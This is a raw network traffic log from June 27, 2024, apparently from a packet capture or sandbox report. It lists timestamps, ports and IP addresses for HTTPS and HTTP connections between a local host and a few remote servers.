Jun 27, 2024 05:58:35.590840101 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.590852976 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.590902090 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.590902090 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.591696978 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.591717005 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.591763973 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.591775894 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.591800928 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.591816902 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.616012096 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.616071939 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.616127014 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.616151094 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.616177082 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.616197109 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.655952930 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.656027079 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.656059027 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.656122923 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.656155109 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.656223059 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.679779053 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.679825068 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.679863930 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.679878950 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.679907084 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.679996014 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.680685997 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.680726051 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.680756092 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.680768013 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.680793047 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.680864096 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.681674957 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.681721926 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.681759119 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.681771040 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.681796074 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.681969881 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.682635069 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.682674885 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.682704926 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.682717085 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.682743073 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.682890892 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.683548927 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.683588982 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.683624029 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.683635950 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.683660984 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.683680058 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.684478998 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.684577942 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.684580088 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.684609890 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.684648991 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.684669971 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.710144997 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.710206032 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.710258007 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.710288048 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.710314989 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.710344076 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.748976946 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.749006987 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.749058962 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.749083042 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.749104023 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.749123096 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.772708893 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.772746086 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.772803068 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.772840023 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.772857904 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.772878885 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.773175001 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.773205996 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.773248911 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.773258924 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.773283958 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.773304939 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.774286032 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.774313927 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.774364948 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.774374008 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.774399042 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.774415016 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.775217056 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.775242090 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.775295019 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.775304079 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.775335073 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.776155949 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.776180029 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.776241064 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.776249886 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.776341915 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.777080059 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.777105093 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.777157068 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.777167082 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.777240038 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.802690983 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.802715063 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.802798033 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.802892923 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.802963972 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.841626883 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.841655970 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.841720104 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.841756105 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.841790915 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.841984987 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.866064072 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.866099119 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.866149902 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.866169930 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.866195917 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.866214037 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.866590977 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.866610050 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.866672039 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.866687059 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.866759062 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.868194103 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.868215084 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.868278980 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.868294954 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.868349075 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.869172096 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.869205952 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.869251013 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.869266033 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.869292021 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.869322062 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.870663881 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.870692015 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.870737076 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.870752096 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.870778084 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.870798111 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.870929003 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.870966911 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.871014118 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.871028900 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.871058941 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.871076107 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.895212889 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.895236015 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.895298004 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.895317078 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.895505905 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.934241056 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.934259892 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.934302092 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.934312105 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.934343100 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.934375048 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.958847046 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.958878040 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.958936930 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.958955050 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.958981037 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.958997965 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.959511995 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.959528923 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.959584951 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.959599972 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.959624052 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.959640980 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.961159945 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.961186886 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.961244106 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.961258888 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.961282969 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.961304903 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.961848974 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.961880922 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.961926937 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.961946964 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.961967945 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.961992979 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.962822914 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.962841034 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.962889910 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.962908983 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.962929964 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.962946892 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.963773966 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.963792086 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.963844061 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.963857889 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.963881969 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.963948011 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.988151073 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.988168001 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.988235950 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.988259077 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.988293886 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.988293886 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.027993917 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.028022051 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.028069019 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.028099060 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.028121948 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.028148890 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.051692009 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.051708937 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.051764011 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.051784992 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.051810026 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.051830053 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.052557945 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.052577972 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.052627087 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.052642107 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.052666903 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.052685976 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.053436995 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.053455114 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.053498983 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.053514004 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.053538084 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.053556919 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.054981947 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.054996967 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.055058002 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.055073023 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.055160999 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.055903912 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.055927038 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.055986881 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.056000948 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.056027889 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.056047916 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.056813002 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.056828976 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.056881905 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.056896925 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.056946993 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.080523014 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.080538988 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.080586910 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.080632925 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.080646992 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.080689907 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.120506048 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.120524883 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.120599985 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.120619059 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.120732069 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.126449108 CEST	49725	443	192.168.2.7	216.58.206.36
Jun 27, 2024 05:58:36.126485109 CEST	443	49725	216.58.206.36	192.168.2.7
Jun 27, 2024 05:58:36.126878977 CEST	49725	443	192.168.2.7	216.58.206.36
Jun 27, 2024 05:58:36.127110004 CEST	49725	443	192.168.2.7	216.58.206.36
Jun 27, 2024 05:58:36.127124071 CEST	443	49725	216.58.206.36	192.168.2.7
Jun 27, 2024 05:58:36.144390106 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.144407988 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.144563913 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.144643068 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.144781113 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.145327091 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.145348072 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.145401955 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.145412922 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.145447016 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.145481110 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.146219015 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.146235943 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.146290064 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.146300077 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.146322012 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.146406889 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.147207975 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.147223949 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.147295952 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.147305012 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.147370100 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.148334980 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.148351908 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.148427010 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.148436069 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.148463011 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.148495913 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.149122953 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.149139881 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.149209976 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.149219990 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.149384022 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.170279980 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.170361042 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:36.170360088 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.170478106 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.170891047 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:36.655441046 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:36.660425901 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:36.660506964 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:36.660650015 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:36.665528059 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:36.762645006 CEST	443	49725	216.58.206.36	192.168.2.7
Jun 27, 2024 05:58:36.762871027 CEST	49725	443	192.168.2.7	216.58.206.36
Jun 27, 2024 05:58:36.762881994 CEST	443	49725	216.58.206.36	192.168.2.7
Jun 27, 2024 05:58:36.763972998 CEST	443	49725	216.58.206.36	192.168.2.7
Jun 27, 2024 05:58:36.764094114 CEST	49725	443	192.168.2.7	216.58.206.36
Jun 27, 2024 05:58:36.765408993 CEST	49725	443	192.168.2.7	216.58.206.36
Jun 27, 2024 05:58:36.765480995 CEST	443	49725	216.58.206.36	192.168.2.7
Jun 27, 2024 05:58:36.819643021 CEST	49725	443	192.168.2.7	216.58.206.36
Jun 27, 2024 05:58:36.819654942 CEST	443	49725	216.58.206.36	192.168.2.7
Jun 27, 2024 05:58:36.866552114 CEST	49725	443	192.168.2.7	216.58.206.36
Jun 27, 2024 05:58:37.342556000 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.342577934 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.342588902 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.342679024 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.342784882 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.342797041 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.342880964 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.343154907 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.343167067 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.343177080 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.343189001 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.343200922 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.343223095 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.343266010 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.348587990 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.348632097 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.348643064 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.348722935 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.457880974 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.457901001 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.457911968 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.457947969 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.458019972 CEST	80	49726	77.91.77.81	192.168.2.7
